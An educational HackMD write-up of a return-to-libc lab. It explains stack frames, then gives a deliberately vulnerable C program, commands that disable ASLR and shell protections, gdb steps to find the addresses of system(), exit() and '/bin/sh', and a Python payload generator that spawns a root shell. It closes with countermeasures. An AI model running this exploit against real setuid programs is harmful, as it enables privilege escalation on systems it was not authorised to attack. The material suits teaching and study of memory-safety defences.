Try   HackMD

Return-to-libc attack

By using buffer overflow attack, attacker can cause a program to jump to shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable; therefore, jumping to the shellcode will cause the program to fail.

Unfortunately, the above protection scheme is not fool-proof. There exists another type of attacks, the return-to-libc attack, which does not need an executable stack; it does not even use shell code. Instead, it causes the vulnerable program to jump to some existing code, such as the system() function in the libc library, which is already loaded into the memory.

Prerequisites

The system function

The system function is a function of libc library. The way it work is simple. First it invoke new shell process, then it passes its first argument as the command of this new shell. The new shell then execute this command.

What make the system vulnerable is that the effective user ID of the invoke shell is the same with its parent process. Therefore, if we call system("/bin/sh") in a privileged program, the invoked shell will have privileged permission, and then the command executed by it will also have privileged permission. For example, malicious user can call system("/bin/sh") in a Set-UID program to invoke a privileged shell and use it to harm our system.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Activation record

Every function has its own space and this space has structure. This space is called activation record. The structure of the activation record is simple. We will placed our origin at the ebp pointer. The ebp pointer to the previous ebp value. Right above the ebp is the return address, then comes the first argument of the function, then the second, the third, etc. Right below the ebp is the first local variable, then the second, the third, etc.

For example, if we have this function

void ARDemo (int k, int j, int i) {
    int a; 
    float r; 
    char c; 
    bool b; 
    short w; 
    // ...
}

Then its activation record when the function is executed will look like this picture below:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Function prologue and epilogue

To insert an argument for malicious function into memory, we need to know exactly how a function memory will allocated as well as deallocated. To achieve this, instruction often call a piece of code when entering and exiting a function, such of that is called function prologue and epilogue.

Function prologue: This assembly code will be called every time a function is invoked:

pushl %ebp // Save caller's frame pointer
movl %esp, %ebp // / et callee's frame pointer
subl $N, %esp  // Save space for the local variables 

Before these code is run, the return address (denoted as RA) has been pushed into the stack and the stack pointer esp were pointing to this address. Next, the first instruction pushl %ebp will push the value of previous frame pointer ebp (frame pointer of the caller) into stack, so when the function returns, the caller's frame pointer can be recovered. After that, the second instruction now set the frame pointer ebp to current frame, which mean the value of the stack pointer esp. The third instruction move stack pointer esp by

N bytes to preserve the function's local variable space.
Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Function epilogue: like the prologue, function epilogue is called every time the function return:

movl %ebp, %esp
popl %ebp
ret

This is the inverse the prologue does, so the previous context can be restored. The first instruction move the stack pointer to frame pointer, which is the end of stack. Next instruction restore ebp to its previous value. The last instruction pips the return address from the stack and then jumps to it.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

How the attack happen?

Overview

There is a region in the memory where plenty of code can be found. It is the region for the standard C library functions. In Linux, the library is called libc, which is a dynamic link library. Most programs use the functions inside the libc library, so before these programs start running, the operating system will load the libc library into memory.

So which function in libc can help attacker achieve their malicious goal? Several such functions exist inside libc, the easiest one to use is system() function. system() function simply invoke a new shell and executes the string argument it is passed by that shell. At this time, we just need to pass the string "/bin/sh" to system() and it will spawn new privileged shell since our parent process is a Set-UID program. Besides the system() function, there exists a lot of difference function that can do harm to our system, such as execv() function, setuid() function, etc.

Experiment

Since the return-to-libc attack on 64-bit machine is much more difficult than on the 32-bit one, we decide to make a demonstration on 32-bit machine for simplicity.

Assume that we have the following program:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

int bof(char *str)
{
    char buffer[BUF_SIZE];
    unsigned int *framep;
    
    strcpy(buffer, str);  
    
    return 1;
}

int main(int argc, char **argv)
{
   char input[1000];
   FILE *badfile;

   badfile = fopen("badfile", "r");
   int length = fread(input, sizeof(char), 1000, badfile);

   bof(input);

   return 1;
}

This program is vulnerable. First, it read

300 byte from the file named badfile. Then, it pass the string str into bof function. After that,str is copied into a function variable buffer. However, buffer has just 12 memory space, therefore the overflow will happen.

Assume that the program has been compiled with option -z noexecstack (which mean the stack is turned non-executable), so we cannot insert a shellcode and jump to it. Here is where the return-to-libc attack come. The attack will come with

4 step:

  1. Find the address of system() function
  2. Find the address of "/bin/sh"
  3. Find where exactly we should place the address
  4. Generate badfile content and perform the attack

Setup

For doing this experiment, some countermeasures need to be turned off.

  • Address Space Randomization
$ sudo sysctl -w kernel.randomize_va_space=0
  • The StackGuard Protection Scheme
gcc -m32 -fno-stack-protector example.c
  • Configuring /bin/sh: In Ubuntu 20.04, the /bin/sh symbolic link points to the /bin/dash shell.The dash shell has a countermeasure that prevents itself from being executed in a Set-UID process. Therefore, we have to link the /bin/sh to /bin/zsh
$ sudo ln -sf /bin/zsh /bin/sh

Step 1: Find the address of system() function

In Linux, thelibc library is loaded into program memory at runtime. When the memory address randomization is turned off, the library's address in one program is remained unchanged no matter how many time you run it (but it can differ between programs). Therefore, we can easily find out the address of the system() using debugging tool such as gdb.

First, we create an empty badfile file for debugging:

$ touch badfile

Next, we compile a file with debug flag, remember to add option -m32 to compile with 32-bit architecture and other option for turn off coutermeasures:

$ gcc -m32 -fno-stack-protector -z noexecstack -g -o retlib_dbg retlib.c

Then, we make a a program Set-UID program. It should be noted that even for the same program, if we change it from a Set-UID program to a non-Set-UID program, the libc library may not be loaded into the same location. Therefore, when we debug the program, we need to debug the target Set-UID program:

$ sudo chowm root retlib_dbg
$ sudo chmod 4755 retlib_dbg

After that, we just need to debug a program, set a breakpoint at main function, run the program and print out the address:

$ gdb -q retlib_dbg
gdb-peda$ b main
Breakpoint 1 at 0x12ef: file retlib.c, line 33
gdb-peda$ run
gdb-peda$ p system
0xf7e12420 

Step 2: Find the address of "/bin/sh"

Now we just have address of system() function, next we will find out the address of its argument - a string "/bin/sh" - since we want to call system("/bin/sh") to invoke a privileged shell.

There are many ways to achieve this goal and we choose a environment variable method. Let us define a new shell variable MYSHELL="/bin/sh" and mark it as export for turning it into environment variable of program.

$ export MYSHELL=/bin/sh

The location of this variable in the memory can be found out easily using the following program:

void main(){
    char* shell =  getenv("MYSHELL");
    if (shell) printf("%x\n", (unsigned int)shell);
}

Compile the code above into a binary called prtenv. Remember that this program name must have same number of letters as the target program (here retlib program) since the name of a program will be pushed into stack before environment variables, therefore different length of names can cause different addresses of environment variables in the program:

$ gcc -m32 -o prtenv prtenv.c

Run the program, we will have address of our needed string:

$ ./prtenv
ffffd0d7

Step 3: Find where exactly we should place the address

First, we should know the distance from the buffer to the ebp pointer. We can achieve this easily by debug the program:

$ gdb -q retlib_dbg
gdb-peda$ b bof
gdb-peda$ run
gdb-peda$ next
gdb-peda$ p $ebp
0xffffc9c8
gdb-peda$ p &buffer
0xffffc9b0
gdb-peda$ p/d 0xffffc9c8 - 0xffffc9b0
24

Next, we know that the return address is placed right after ebp, so we will put it at the 24 + 4 = 28-th character of the string.

After the function epilogue of bof is called, the stack pointer will be at the address right above where the return address was stored. Then, it jump to the function prologue of system() function, at this time the previousebp is added to stack and move esp by

4 bytes downward. The second isntruction of prologue now point the ebp to esp. At that point, based on the activation record structure, we know that before ebp is the return address and before the return address is the function argument, from first to last. By that, we conclude the "/bin/sh" placed in buffer is 28 + 4 + 4 = 36-th character.

The program will jump to an invalid address after we run the system function, unless we specify the return address for system function. Therefore, we need to find the address of the exit function in the program (the same way as finding system function address), then put it at the 28 + 4 = 32-th byte of the character.

The above analysis can be visualize by this picture.

Step 4: Generate badfile content and perform the attack

The last thing we have to do is to construct the badfile content based on our analysis.

We will use a Python program to generate it:

#!/usr/bin/env python3
import sys

# Fill content with non-zero values
content = bytearray(0xaa for i in range(300))

X = 36
sh_addr = 0xffffd2e7    # The address of "/bin/sh"
content[X:X+4] = (sh_addr).to_bytes(4,byteorder='little')

Y = 28
system_addr = 0xf7e12420   # The address of system()
content[Y:Y+4] = (system_addr).to_bytes(4,byteorder='little')

Z = 32
exit_addr = 0xf7e04f80     # The address of exit()
content[Z:Z+4] = (exit_addr).to_bytes(4,byteorder='little')

# Save content to a file
with open("badfile", "wb") as f:
  f.write(content)

The last thing we have to do is just run the program and enjoy the result:

$ python3 exploit.py
$ ./retlib
#

Countermeasures

There are lot of things to counter this attack.

First one is address space randomization, the OS can take advantage of this to make the starting address of heap and stack changed every time you run the program. Therefore, it is much harder to guess the address of system() function and other addresses.

Second one is Stack-Guard to prevent buffer overflows implemented by the gcc compiler. In the presence of this protection, buffer overflow attacks do not work.

Next, the /bin/dash shell has a countermeasure that prevents itself from being executed in a Set-UID process. If dash executed in a Set-UID process, it immediately changes the effective user ID to the process's real userID, essentially dropping its privilege.

The last one is ASCII armoring. With this, all the system libraries (e.g. libc) addresses contain a NULL byte (0x00). So when a string is read with string-based function like strcpy, it will terminate at this NULL bytes, prevent the overflow attack.